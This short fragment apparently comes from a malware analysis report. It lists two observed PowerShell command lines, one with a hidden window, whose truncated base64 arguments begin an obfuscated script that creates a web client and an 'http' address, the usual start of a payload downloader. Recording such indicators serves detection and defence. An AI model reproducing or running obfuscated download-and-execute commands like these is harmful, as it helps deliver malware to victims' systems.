Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaADkAXwBfADQAXwA1AF8APQAoACcAQwA4ACcAKwAnAF8AMgAyADAAJwApADsAJABoAF8AXwAwADgAOAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABOADIAXwAwAF8ANgA3ADcAPQAoACcAaAB0AH...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaADkAXwBfADQAXwA1AF8APQAoACcAQwA4ACcAKwAnAF8AMgAyADAAJwApADsAJABoAF8AXwAwADgAOAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABOADIAXwAwAF8ANgA3ADcAPQAoACcAaAB0AH...' (with hidden window)